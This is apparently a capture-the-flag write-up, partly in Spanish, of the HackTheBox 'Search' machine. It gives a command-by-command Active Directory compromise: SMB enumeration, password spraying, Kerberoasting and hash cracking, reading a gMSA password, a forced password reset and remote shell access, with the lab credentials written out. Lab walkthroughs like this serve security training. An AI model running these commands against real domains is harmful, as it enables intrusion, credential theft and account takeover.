SEARCH - HackMD

# SEARCH ``` nmap -sS --min-rate 5000 -vvv -p- -Pn -n 10.10.11.129 -oG allPorts ``` ![](https://i.imgur.com/ujwxcnj.png) ``` crackmapexec smb 10.10.11.129 ``` ![](https://i.imgur.com/E6LNjRU.png) ``` ┌─[root@cr4y0-PC]─[/home/cr4y0/Desktop/HackTheBox/SEARCH] └──╼ #echo "10.10.11.129 search.htb RESEARCH" >> /etc/hosts ``` ![](https://i.imgur.com/vhfTk5Q.png) ``` rpcclient -U "" 10.10.11.129 -N rpcclient 10.10.11.129 -U '%' ``` ![](https://i.imgur.com/nuIHByI.png) Se inspecciona el certificado ssl ya que es posible encontrar en los CN nombres de dominio alternativos. ``` openssl s_client -connect 10.10.11.129:443 ``` ![](https://i.imgur.com/wikK28c.png) `10.10.11.129 search.htb RESEARCH research.search.htb` ![](https://i.imgur.com/eRZWpoP.png) Enumerando los name server ``` dig @10.10.11.129 search.htb ns ``` ENumerando los servidores de correo `dig @10.10.11.129 search.htb mx` Probar un ataque de transferencia de zona ``` dig @10.10.11.129 search.htb axfr ``` ![](https://i.imgur.com/b7FHGvF.png) ## WEB ![](https://i.imgur.com/mul4tuj.png) ![](https://i.imgur.com/OInbJK8.png) ``` crackmapexec smb 10.10.11.129 -u users -p 'IsolationIsKey?' ``` ![](https://i.imgur.com/JplpOmB.png) `hope.sharp:IsolationIsKey?` ``` crackmapexec smb 10.10.11.129 -u hope.sharp -p 'IsolationIsKey?' --shares ``` ![](https://i.imgur.com/TdUH3vp.png) ``` crackmapexec smb 10.10.11.129 -u hope.sharp -p 'IsolationIsKey?' --users ``` ![](https://i.imgur.com/RevVhD4.png) ``` crackmapexec smb 10.10.11.129 -u hope.sharp -p 'IsolationIsKey?' --groups ``` ![](https://i.imgur.com/cI3HUgv.png) ``` rpcclient -U "hope.sharp%IsolationIsKey?" 10.10.11.129 rpcclient $> enumdomusers rpcclient -U "hope.sharp%IsolationIsKey?" 10.10.11.129 -c "enumdomusers" | grep -oP "\[.*?\]" | grep -v "0x" | tr -d "[]" | sort -u > long_users.txt ``` ![](https://i.imgur.com/YelfD4E.png) ``` /opt/kerbrute/kerbrute userenum --dc 10.10.11.129 --domain search.htb -t 50 long_users.txt ``` ![](https://i.imgur.com/TqYvUP2.png) Todos los usuarios son válidos pero ninguno ASRProasteable rdate -n 10.10.11.129 ntpdate 10.10.11.129 En ocasiones el ataque no funciona porque la hora del DC es diferente a la máquina atacante ``` impacket-GetUserSPNs -dc-ip 10.10.11.129 search.htb/hope.sharp:IsolationIsKey? -request ``` ![](https://i.imgur.com/Evsyibc.png) ``` john --wordlist=/usr/share/wordlists/rockyou.txt hashWEB_SVC ``` ![](https://i.imgur.com/VVxn5Ej.png) ``` crackmapexec smb 10.10.11.129 -u web_svc -p @3ONEmillionbaby ``` ![](https://i.imgur.com/ySpTqtx.png) ``` crackmapexec smb 10.10.11.129 -u long_users.txt -p @3ONEmillionbaby --continue-on-success ``` ![](https://i.imgur.com/H7aQFxs.png) ![](https://i.imgur.com/8OH4T90.png) ``` Edgar.Jacobs:@3ONEmillionbaby web_svc:@3ONEmillionbaby ``` ``` ldapdomaindump -u 'search.htb\hope.sharp' -p 'IsolationIsKey?' 10.10.11.129 ``` ![](https://i.imgur.com/oSWSxij.png) ![](https://i.imgur.com/SWekSYy.png) ``` python3 /opt/BloodHound.py/bloodhound.py -c All -u 'hope.sharp' -p 'IsolationIsKey?' -ns 10.10.11.129 -d search.htb ``` ![](https://i.imgur.com/A9EIavy.png) ![](https://i.imgur.com/QU9X9xq.png) ![](https://i.imgur.com/y6AJ8mJ.png) ``` smbmap -H 10.10.11.129 -u 'hope.sharp' -p 'IsolationIsKey?' smbmap -H 10.10.11.129 -u 'hope.sharp' -p 'IsolationIsKey?' -R ``` ![](https://i.imgur.com/so7IcU3.png) ![](https://i.imgur.com/12uLfdC.png) ![](https://i.imgur.com/YYN9icM.png) ``` smbclient \\\\10.10.11.129\\RedirectedFolders$ -U 'hope.sharp' Enter WORKGROUP\hope.sharp's password: IsolationIsKey? ``` ![](https://i.imgur.com/JfAnHHc.png) ``` smbmap -H 10.10.11.129 -u 'hope.sharp' -p 'IsolationIsKey?' --download 'RedirectedFolders$/sierra.frye/user.txt' ``` ![](https://i.imgur.com/xlDb7Mm.png) ``` smbmap -H 10.10.11.129 -u 'Edgar.Jacobs' -p '@3ONEmillionbaby' -R ``` ![](https://i.imgur.com/Qx58W1X.png) ``` smbmap -H 10.10.11.129 -u 'Edgar.Jacobs' -p '@3ONEmillionbaby' --download 'RedirectedFolders$\edgar.jacobs\Desktop\Phishing_Attempt.xlsx' ``` ![](https://i.imgur.com/MHHFc7R.png) ``` libreoffice 10.10.11.129-RedirectedFolders_edgar.jacobs_Desktop_Phishing_Attempt.xlsx ``` ![](https://i.imgur.com/9B2ELoE.png) ![](https://i.imgur.com/XMf8Lsm.png) ``` unzip 10.10.11.129-RedirectedFolders_edgar.jacobs_Desktop_Phishing_Attempt.xlsx vi ./xl/worksheets/sheet2.xml ``` ![](https://i.imgur.com/FYpUfkK.png) ![](https://i.imgur.com/r3iwRTM.png) ![](https://i.imgur.com/mcTadVp.png) ``` zip Document.xlsx -r . ``` ![](https://i.imgur.com/GI4tBeS.png) ``` libreoffice Document.xlsx ``` ![](https://i.imgur.com/sUMWVtD.png) ``` crackmapexec smb 10.10.11.129 -u usernames -p password --no-bruteforce ``` ![](https://i.imgur.com/J3FDQRg.png) ``` smbmap -H 10.10.11.129 -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' --download 'RedirectedFolders$/sierra.frye/user.txt' ``` ![](https://i.imgur.com/8t8hTDP.png) ![](https://i.imgur.com/VX4jwf5.png) ``` \RedirectedFolders$\Savanah.Velazquez\ ``` ``` wfuzz -c --hc=404 --hh=44982 -t 100 -w /opt/dictionary/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt 'http://search.htb/FUZZ' ``` ![](https://i.imgur.com/6ltAmro.png) ![](https://i.imgur.com/o9o8XHA.png) ![](https://i.imgur.com/paAhkx2.png) ``` /usr/share/john/pfx2john.py search-RESEARCH-CA.p12 > hash1 /usr/share/john/pfx2john.py staff.pfx > hash2 ``` ``` john --wordlist=/usr/share/wordlists/rockyou.txt hash1 ``` ![](https://i.imgur.com/nRlmZGv.png) ![](https://i.imgur.com/QnCdH7T.png) ``` Sierra.Frye $$49=wide=STRAIGHT=jordan=28$$18 research ``` ![](https://i.imgur.com/rVZELfz.png) ![](https://i.imgur.com/educSz2.png) ![](https://i.imgur.com/i9sBn21.png) ``` Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' ``` ![](https://i.imgur.com/A8aS3GC.png) ``` Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword' ``` ![](https://i.imgur.com/jwSKeBK.png) ``` $gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword' $mp = $gmsa.'msDS-ManagedPassword' ConvertFrom-ADManagedPasswordBlob $mp ``` ![](https://i.imgur.com/HwQYwks.png) ``` $secpw = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword $cred = New-Object System.Management.Automation.PScredential 'BIR-ADFS-GMSA',$secpw Invoke-Command -ComputerName localhost -Cred $cred -ScriptBlock { whoami } ``` ![](https://i.imgur.com/fmDAFwP.png) ``` Invoke-Command -ComputerName localhost -Cred $cred -ScriptBlock { net user tristan.davies cr4y0123$ } ``` ![](https://i.imgur.com/Fouuh0n.png) ![](https://i.imgur.com/3rc5svp.png) ``` wmiexec.py 'search.htb/tristan.davies':'cr4y0123$'@10.10.11.129 ``` ![](https://i.imgur.com/i7qP00V.png)